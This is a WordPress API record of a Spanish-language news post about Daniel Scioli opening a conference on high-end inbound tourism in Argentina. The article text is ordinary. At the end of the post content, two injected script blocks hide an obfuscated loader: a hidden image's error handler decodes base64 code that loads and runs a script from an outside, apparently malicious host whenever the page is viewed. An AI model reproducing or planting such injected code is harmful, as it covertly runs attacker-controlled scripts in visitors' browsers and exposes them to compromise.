{"id":5201,"date":"2025-05-29T08:25:36","date_gmt":"2025-05-29T11:25:36","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=5201"},"modified":"2025-08-13T23:32:03","modified_gmt":"2025-08-14T02:32:03","slug":"scioli-en-la-apertura-de-conferencia-sobre-turismo-receptivo-de-alta-gama","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=5201","title":{"rendered":"Scioli en la apertura de conferencia sobre turismo receptivo de alta gama"},"content":{"rendered":"\n<p><strong><em>Disertaciones de especialistas sobre ese segmento tur\u00edstico y perspectivas a futuro.<\/em><\/strong><\/p>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,\u00a0<strong>Daniel Scioli<\/strong>, particip\u00f3 de la apertura del Ciclo de conferencias: \u201c<strong>El turismo receptivo de alta gama y los desaf\u00edos para crecer<\/strong>\u201d de\u00a0<strong>Destino Argentina<\/strong>, junto con su presidente, Daniel Manzella.<\/p>\n\n\n\n<p>All\u00ed\u00a0<strong>Scioli<\/strong>\u00a0abord\u00f3 la importancia del segmento de alta gama para recibir m\u00e1s turistas extranjeros: \u201c<em>Estamos absolutamente comprometidos en poner todos los esfuerzos para mostrar esta nueva Argentina del presidente Milei, que genera cada vez m\u00e1s atracci\u00f3n y confianza por la fuerza de los hechos, como haber derrotado a la inflaci\u00f3n por<\/em>\u00a0knock out,\u00a0<em>haber logrado estabilidad y la vuelta del cr\u00e9dito a partir del orden fiscal. Milei no solamente defini\u00f3 al turismo como una actividad estrat\u00e9gica en la recuperaci\u00f3n de Argentina, sino que puso en marcha una pol\u00edtica de cielos abiertos sin precedentes, con aerol\u00edneas que vuelven al pa\u00eds, que aumentan frecuencias o rutas a\u00e9reas<\/em>\u201d.<\/p>\n\n\n\n<p>Asimismo, el\u00a0<strong>Secretario<\/strong>\u00a0asegur\u00f3 que se est\u00e1 trabajando para cambiar la l\u00f3gica de las mediciones del INDEC y del Banco Central: \u201c<em>Est\u00e1 muy baja la estimaci\u00f3n del consumo de los turistas que llegan, necesitamos tener cifras certeras e informaci\u00f3n correcta sobre la cual trabajar. Y as\u00ed como cambiamos los derechos especiales, como Sadaic, estamos trabajando junto al sector privado para cambiar tambi\u00e9n esta distorsi\u00f3n que se da<\/em>\u201d.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/sites\/default\/files\/whatsapp_image_2025-05-27_at_12.39.31.jpeg\" alt=\"\"\/><\/figure>\n\n\n\n<p>Por su parte,&nbsp;<strong>Manzella<\/strong>&nbsp;habl\u00f3 sobre las b\u00fasquedas actuales de los turistas: \u201c<em>El viajero cambi\u00f3 sus necesidades y requerimientos para viajar, hoy busca naturaleza, experiencias aut\u00e9nticas, y Argentina con sus destinos maravillosos tiene todo eso, en cantidad y calidad. Tenemos desaf\u00edos por delante, por eso estamos reunidos para avanzar en las necesidades de nuestro segmento<\/em>\u201d.<\/p>\n\n\n\n<p>Adem\u00e1s, estuvieron presentes la secretaria Ejecutiva de INPROTUR,&nbsp;<strong>Ana Garc\u00eda Allievi<\/strong>; el presidente de la C\u00e1mara Argentina de Turismo (CAT),&nbsp;<strong>Gustavo Hani<\/strong>; el presidente del Ente de Turismo Buenos Aires,&nbsp;<strong>Valent\u00edn D\u00edaz Gilligan<\/strong>&nbsp;y la presidenta de la Asociaci\u00f3n Argentina de Organizadores y Proveedores de Exposiciones, Congresos, Eventos y de Bur\u00f3s de Convenciones (AOCA),&nbsp;<strong>Patricia Dur\u00e1n Vaca;<\/strong>&nbsp;y el , vicepresidente primero de la CAT,&nbsp;<strong>Fernando Gorbar\u00e1n<\/strong>.<\/p>\n\n\n\n<p>Finalizada la apertura del evento, la agenda del secretario&nbsp;<strong>Scioli<\/strong>&nbsp;continu\u00f3 con una&nbsp;<strong>misi\u00f3n oficial a Espa\u00f1a<\/strong>&nbsp;donde mantendr\u00e1 en las pr\u00f3ximas 48 horas reuniones con directivos de&nbsp;<strong>l\u00edneas a\u00e9reas<\/strong>&nbsp;y&nbsp;<strong>grupos inversores<\/strong>&nbsp;junto con el recientemente designado embajador argentino en Espa\u00f1a,&nbsp;<strong>Wenceslao Bunge Saravia<\/strong>; Ana Garc\u00eda Allievi; y Gustavo Hani. Tambi\u00e9n participar\u00e1 de la Sesi\u00f3n del&nbsp;<strong>Consejo Ejecutivo de ONU<\/strong>&nbsp;Turismo donde 35 miembros recomendar\u00e1n un candidato para ocupar el cargo de&nbsp;<em>Secretario General para el per\u00edodo 2026-2029<\/em>.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:273px;height:auto\"\/><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Disertaciones de especialistas sobre ese segmento tur\u00edstico y perspectivas a futuro. El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,\u00a0Daniel Scioli, particip\u00f3 de la apertura del Ciclo de conferencias: \u201cEl turismo receptivo de alta gama y los desaf\u00edos para crecer\u201d de\u00a0Destino Argentina, junto con su presidente, Daniel Manzella. All\u00ed\u00a0Scioli\u00a0abord\u00f3 la importancia del segmento de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":5202,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[16,22],"tags":[],"class_list":{"0":"post-5201","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-ferias-y-congresos","8":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5201"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5201"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5201\/revisions"}],"predecessor-version":[{"id":6479,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/5201\/revisions\/6479"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/5202"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5201"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5201"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5201"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}